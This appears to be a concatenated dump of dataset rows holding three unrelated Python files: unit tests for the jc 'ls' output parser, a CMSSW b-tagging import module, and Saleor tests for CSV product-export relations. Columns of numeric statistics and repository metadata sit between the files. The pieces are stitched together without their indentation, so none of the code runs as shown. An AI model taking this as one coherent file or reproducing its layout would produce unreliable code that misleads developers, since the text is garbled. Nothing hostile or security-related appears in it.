with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-al.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_al_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alh.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alh.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.11.6/ls-alh.json'), 'r', encoding='utf-8') as f:
self.osx_10_11_6_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alh.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alh_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-alR.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-alR.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-alR.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_alR_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-glob.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-glob.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-glob.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_glob_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-R-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_R_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-l-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_l_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.centos_7_7_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-newlines.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_newlines_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/osx-10.14.6/ls-lR-empty-folder.json'), 'r', encoding='utf-8') as f:
self.osx_10_14_6_ls_lR_empty_folder_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/ls-l-iso.json'), 'r', encoding='utf-8') as f:
self.ubuntu_18_4_ls_l_iso_json = json.loads(f.read())
def test_ls_empty_dir(self):
"""
Test plain 'ls' on an empty directory
"""
self.assertEqual(jc.parsers.ls.parse('', quiet=True), [])
def test_ls_centos_7_7(self):
"""
Test plain 'ls /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls, quiet=True), self.centos_7_7_ls_json)
def test_ls_ubuntu_18_4(self):
"""
Test plain 'ls /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls, quiet=True), self.ubuntu_18_4_ls_json)
def test_ls_osx_10_11_6(self):
"""
Test plain 'ls /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls, quiet=True), self.osx_10_11_6_ls_json)
def test_ls_osx_10_14_6(self):
"""
Test plain 'ls /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls, quiet=True), self.osx_10_14_6_ls_json)
def test_ls_al_centos_7_7(self):
"""
Test 'ls -al /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_al, quiet=True), self.centos_7_7_ls_al_json)
def test_ls_al_ubuntu_18_4(self):
"""
Test 'ls -al /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_al, quiet=True), self.ubuntu_18_4_ls_al_json)
def test_ls_al_osx_10_11_6(self):
"""
Test 'ls -al /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls_al, quiet=True), self.osx_10_11_6_ls_al_json)
def test_ls_al_osx_10_14_6(self):
"""
Test 'ls -al /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_al, quiet=True), self.osx_10_14_6_ls_al_json)
def test_ls_alh_centos_7_7(self):
"""
Test 'ls -alh /' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_alh, quiet=True), self.centos_7_7_ls_alh_json)
def test_ls_alh_ubuntu_18_4(self):
"""
Test 'ls -alh /' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_alh, quiet=True), self.ubuntu_18_4_ls_alh_json)
def test_ls_alh_osx_10_11_6(self):
"""
Test 'ls -alh /' on OSX 10.11.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_11_6_ls_alh, quiet=True), self.osx_10_11_6_ls_alh_json)
def test_ls_alh_osx_10_14_6(self):
"""
Test 'ls -alh /' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_alh, quiet=True), self.osx_10_14_6_ls_alh_json)
def test_ls_R_centos_7_7(self):
"""
Test 'ls -R /usr' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_R, quiet=True), self.centos_7_7_ls_R_json)
def test_ls_R_ubuntu_18_4(self):
"""
Test 'ls -R /usr' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_R, quiet=True), self.ubuntu_18_4_ls_R_json)
def test_ls_R_osx_10_14_6(self):
"""
Test 'ls -R /usr' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_R, quiet=True), self.osx_10_14_6_ls_R_json)
def test_ls_alR_centos_7_7(self):
"""
Test 'ls -alR /usr' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_alR, quiet=True), self.centos_7_7_ls_alR_json)
def test_ls_alR_ubuntu_18_4(self):
"""
Test 'ls -alR /usr' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_alR, quiet=True), self.ubuntu_18_4_ls_alR_json)
def test_ls_alR_osx_10_14_6(self):
"""
Test 'ls -alR /usr' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_alR, quiet=True), self.osx_10_14_6_ls_alR_json)
def test_ls_glob_centos_7_7(self):
"""
Test 'ls /usr/*' on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_glob, quiet=True), self.centos_7_7_ls_glob_json)
def test_ls_glob_ubuntu_18_4(self):
"""
Test 'ls /usr/*' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_glob, quiet=True), self.ubuntu_18_4_ls_glob_json)
def test_ls_glob_osx_10_14_6(self):
"""
Test 'ls /usr/*' on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_glob, quiet=True), self.osx_10_14_6_ls_glob_json)
def test_ls_R_newlines_centos_7_7(self):
"""
Test 'ls -R' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_R_newlines, quiet=True), self.centos_7_7_ls_R_newlines_json)
def test_ls_R_newlines_ubuntu_18_4(self):
"""
Test 'ls -R' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_R_newlines, quiet=True), self.ubuntu_18_4_ls_R_newlines_json)
def test_ls_R_newlines_osx_10_14_6(self):
"""
Test 'ls -R' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_R_newlines, quiet=True), self.osx_10_14_6_ls_R_newlines_json)
def test_ls_l_newlines_centos_7_7(self):
"""
Test 'ls -l' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_l_newlines, quiet=True), self.centos_7_7_ls_l_newlines_json)
def test_ls_l_newlines_ubuntu_18_4(self):
"""
Test 'ls -l' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_l_newlines, quiet=True), self.ubuntu_18_4_ls_l_newlines_json)
def test_ls_l_newlines_osx_10_14_6(self):
"""
Test 'ls -l' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_l_newlines, quiet=True), self.osx_10_14_6_ls_l_newlines_json)
def test_ls_lR_newlines_centos_7_7(self):
"""
Test 'ls -lR' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_lR_newlines, quiet=True), self.centos_7_7_ls_lR_newlines_json)
def test_ls_lR_newlines_ubuntu_18_4(self):
"""
Test 'ls -lR' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_lR_newlines, quiet=True), self.ubuntu_18_4_ls_lR_newlines_json)
def test_ls_lR_newlines_osx_10_14_6(self):
"""
Test 'ls -lR' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_lR_newlines, quiet=True), self.osx_10_14_6_ls_lR_newlines_json)
def test_ls_newlines_centos_7_7(self):
"""
Test 'ls' for filenames with newline characters on Centos 7.7
"""
self.assertEqual(jc.parsers.ls.parse(self.centos_7_7_ls_newlines, quiet=True), self.centos_7_7_ls_newlines_json)
def test_ls_newlines_ubuntu_18_4(self):
"""
Test 'ls' for filenames with newline characters on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_newlines, quiet=True), self.ubuntu_18_4_ls_newlines_json)
def test_ls_newlines_osx_10_14_6(self):
"""
Test 'ls' for filenames with newline characters on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_newlines, quiet=True), self.osx_10_14_6_ls_newlines_json)
def test_ls_lR_empty_folder_osx_10_14_6(self):
"""
Test 'ls -lR' for empty directories on OSX 10.14.6
"""
self.assertEqual(jc.parsers.ls.parse(self.osx_10_14_6_ls_lR_empty_folder, quiet=True), self.osx_10_14_6_ls_lR_empty_folder_json)
def test_ls_l_iso_ubuntu_18_4(self):
"""
Test 'ls -l --time-style=full-iso' for files with convertible dates on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.ls.parse(self.ubuntu_18_4_ls_l_iso, quiet=True), self.ubuntu_18_4_ls_l_iso_json)
if __name__ == '__main__':
unittest.main()
| 48.335556 | 136 | 0.649579 | 3,863 | 21,751 | 3.398136 | 0.026145 | 0.04266 | 0.046926 | 0.05363 | 0.966786 | 0.957645 | 0.937229 | 0.881542 | 0.828445 | 0.784947 | 0 | 0.061463 | 0.193646 | 21,751 | 449 | 137 | 48.443207 | 0.686983 | 0.079031 | 0 | 0 | 0 | 0.00885 | 0.16796 | 0.144315 | 0 | 0 | 0 | 0 | 0.159292 | 1 | 0.163717 | false | 0 | 0.026549 | 0 | 0.19469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1340d9623f5ee095ef51ab43af16223aaac47aa6 | 352 | py | Python | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoBTag/PerformanceDB/python/PoolBTagPerformanceDBWinter13.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | from RecoBTag.PerformanceDB.measure.Pool_btagMistagWinter13 import *
from RecoBTag.PerformanceDB.measure.Pool_btagMuJetsWpNoTtbar import *
from RecoBTag.PerformanceDB.measure.Pool_btagMuJetsWpTtbar import *
from RecoBTag.PerformanceDB.measure.Pool_btagTtbarWpWinter13 import *
from RecoBTag.PerformanceDB.measure.Pool_btagTtbarDiscrimWinter13 import *
| 58.666667 | 74 | 0.886364 | 35 | 352 | 8.771429 | 0.314286 | 0.19544 | 0.407166 | 0.521173 | 0.664495 | 0.547231 | 0 | 0 | 0 | 0 | 0 | 0.018072 | 0.056818 | 352 | 5 | 75 | 70.4 | 0.906627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13592e18685a1794925ce0875909b60ba520e633 | 16,707 | py | Python | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 4 | 2021-03-27T16:38:48.000Z | 2021-10-18T12:54:15.000Z | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 11 | 2021-03-30T14:26:57.000Z | 2022-03-12T00:51:07.000Z | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 12 | 2019-03-21T03:24:58.000Z | 2022-01-13T10:55:34.000Z | from unittest.mock import patch
from .....graphql.csv.enums import ProductFieldEnum
from .....product.models import Attribute, Product, ProductImage, VariantImage
from .....warehouse.models import Warehouse
from ....utils.products_data import (
ProductExportFields,
add_attribute_info_to_data,
add_collection_info_to_data,
add_image_uris_to_data,
add_warehouse_info_to_data,
get_products_relations_data,
get_variants_relations_data,
prepare_products_relations_data,
prepare_variants_relations_data,
)
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data(prepare_products_data_mocked, product_list):
# given
qs = Product.objects.all()
export_fields = {
"collections__slug" "images__image",
"name",
"description",
}
attribute_ids = []
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.called_once_with(
qs, {"collections__slug", "images__image"}, attribute_ids
)
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data_no_relations_fields(
prepare_products_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = []
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.assert_not_called()
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data_attribute_ids(
prepare_products_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.called_once_with(qs, {}, attribute_ids)
def test_prepare_products_relations_data(product_with_image, collection_list):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = set(
ProductExportFields.HEADERS_TO_FIELDS_MAPPING["product_many_to_many"].values()
)
attribute_ids = [
str(attr.assignment.attribute.pk)
for attr in product_with_image.attributes.all()
]
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
collections = ", ".join(
sorted([collection.slug for collection in collection_list[:2]])
)
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in product_with_image.images.all()
]
)
expected_result = {pk: {"collections__slug": collections, "images__image": images}}
assigned_attribute = product_with_image.attributes.first()
if assigned_attribute:
header = f"{assigned_attribute.attribute.slug} (product attribute)"
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
def test_prepare_products_relations_data_only_fields(
product_with_image, collection_list
):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = {"collections__slug"}
attribute_ids = []
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
collections = ", ".join(
sorted([collection.slug for collection in collection_list[:2]])
)
expected_result = {pk: {"collections__slug": collections}}
assert result == expected_result
def test_prepare_products_relations_data_only_attributes_ids(
product_with_image, collection_list
):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = {"name"}
attribute_ids = [
str(attr.assignment.attribute.pk)
for attr in product_with_image.attributes.all()
]
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
expected_result = {pk: {}}
assigned_attribute = product_with_image.attributes.first()
if assigned_attribute:
header = f"{assigned_attribute.attribute.slug} (product attribute)"
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data(prepare_variants_data_mocked, product_list):
# given
qs = Product.objects.all()
export_fields = {
"collections__slug",
"variants__sku",
"variants__images__image",
}
attribute_ids = []
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(
qs, {ProductFieldEnum.VARIANT_IMAGES.value}, attribute_ids, warehouse_ids
)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_no_relations_fields(
prepare_variants_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = []
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.assert_not_called()
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_attribute_ids(
prepare_variants_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_warehouse_ids(
prepare_variants_data_mocked, product_list, warehouses
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = []
warehouse_ids = list(Warehouse.objects.values_list("pk", flat=True))
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_attributes_and_warehouses_ids(
prepare_variants_data_mocked, product_list, warehouses
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
warehouse_ids = list(Warehouse.objects.values_list("pk", flat=True))
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
def test_prepare_variants_relations_data(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = {"variants__images__image"}
attribute_ids = [str(attr.pk) for attr in Attribute.objects.all()]
warehouse_ids = [str(w.pk) for w in Warehouse.objects.all()]
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in variant.images.all()
]
)
expected_result = {pk: {"variants__images__image": images}}
for assigned_attribute in variant.attributes.all():
header = f"{assigned_attribute.attribute.slug} (variant attribute)"
if str(assigned_attribute.attribute.pk) in attribute_ids:
expected_result[pk][header] = assigned_attribute.values.first().slug
for stock in variant.stocks.all():
if str(stock.warehouse.pk) in warehouse_ids:
slug = stock.warehouse.slug
warehouse_headers = [
f"{slug} (warehouse quantity)",
]
expected_result[pk][warehouse_headers[0]] = stock.quantity
assert result == expected_result
def test_prepare_variants_relations_data_only_fields(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = {"variants__images__image"}
attribute_ids = []
warehouse_ids = []
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in variant.images.all()
]
)
expected_result = {pk: {"variants__images__image": images}}
assert result == expected_result
def test_prepare_variants_relations_data_attributes_ids(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = set()
attribute_ids = [str(attr.pk) for attr in Attribute.objects.all()]
warehouse_ids = []
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
expected_result = {pk: {}}
for assigned_attribute in variant.attributes.all():
header = f"{assigned_attribute.attribute.slug} (variant attribute)"
if str(assigned_attribute.attribute.pk) in attribute_ids:
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
def test_prepare_variants_relations_data_warehouse_ids(
product_with_single_variant, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_single_variant.variants.first()
fields = set()
attribute_ids = []
warehouse_ids = [str(w.pk) for w in Warehouse.objects.all()]
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
expected_result = {pk: {}}
for stock in variant.stocks.all():
if str(stock.warehouse.pk) in warehouse_ids:
slug = stock.warehouse.slug
warehouse_headers = [
f"{slug} (warehouse quantity)",
]
expected_result[pk][warehouse_headers[0]] = stock.quantity
assert result == expected_result
def test_add_collection_info_to_data(product):
# given
pk = product.pk
collection = "test_collection"
input_data = {pk: {}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result[pk]["collections__slug"] == {collection}
def test_add_collection_info_to_data_update_collections(product):
# given
pk = product.pk
existing_collection = "test2"
collection = "test_collection"
input_data = {pk: {"collections__slug": {existing_collection}}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result[pk]["collections__slug"] == {collection, existing_collection}
def test_add_collection_info_to_data_no_collection(product):
# given
pk = product.pk
collection = None
input_data = {pk: {}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result == input_data
def test_add_image_uris_to_data(product):
# given
pk = product.pk
image_path = "test/path/image.jpg"
field = "variant_images"
input_data = {pk: {}}
# when
result = add_image_uris_to_data(product.pk, image_path, field, input_data)
# then
assert result[pk][field] == {"http://mirumee.com/media/" + image_path}
def test_add_image_uris_to_data_update_images(product):
# given
pk = product.pk
old_path = "http://mirumee.com/media/test/image0.jpg"
image_path = "test/path/image.jpg"
input_data = {pk: {"product_images": {old_path}}}
field = "product_images"
# when
result = add_image_uris_to_data(product.pk, image_path, field, input_data)
# then
assert result[pk][field] == {"http://mirumee.com/media/" + image_path, old_path}
def test_add_image_uris_to_data_no_image_path(product):
# given
pk = product.pk
image_path = None
input_data = {pk: {"name": "test"}}
# when
result = add_image_uris_to_data(
product.pk, image_path, "product_images", input_data
)
# then
assert result == input_data
def test_add_attribute_info_to_data(product):
# given
pk = product.pk
slug = "test_attribute_slug"
value = "test value"
attribute_data = {
"slug": slug,
"value": value,
}
input_data = {pk: {}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "product attribute", input_data
)
# then
expected_header = f"{slug} (product attribute)"
assert result[pk][expected_header] == {value}
def test_add_attribute_info_to_data_update_attribute_data(product):
# given
pk = product.pk
slug = "test_attribute_slug"
value = "test value"
expected_header = f"{slug} (variant attribute)"
attribute_data = {
"slug": slug,
"value": value,
}
input_data = {pk: {expected_header: {"value1"}}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "variant attribute", input_data
)
# then
assert result[pk][expected_header] == {value, "value1"}
def test_add_attribute_info_to_data_no_slug(product):
# given
pk = product.pk
attribute_data = {
"slug": None,
"value": None,
}
input_data = {pk: {}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "variant attribute", input_data
)
# then
assert result == input_data
def test_add_warehouse_info_to_data(product):
# given
pk = product.pk
slug = "test_warehouse"
warehouse_data = {
"slug": slug,
"qty": 12,
"qty_alc": 10,
}
input_data = {pk: {}}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
expected_header = f"{slug} (warehouse quantity)"
assert result[pk][expected_header] == 12
def test_add_warehouse_info_to_data_data_not_changed(product):
# given
pk = product.pk
slug = "test_warehouse"
warehouse_data = {
"slug": slug,
"qty": 12,
"qty_alc": 10,
}
input_data = {
pk: {
f"{slug} (warehouse quantity)": 5,
f"{slug} (warehouse quantity allocated)": 8,
}
}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
assert result == input_data
def test_add_warehouse_info_to_data_data_no_slug(product):
# given
pk = product.pk
warehouse_data = {
"slug": None,
"qty": None,
"qty_alc": None,
}
input_data = {pk: {}}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
assert result == input_data
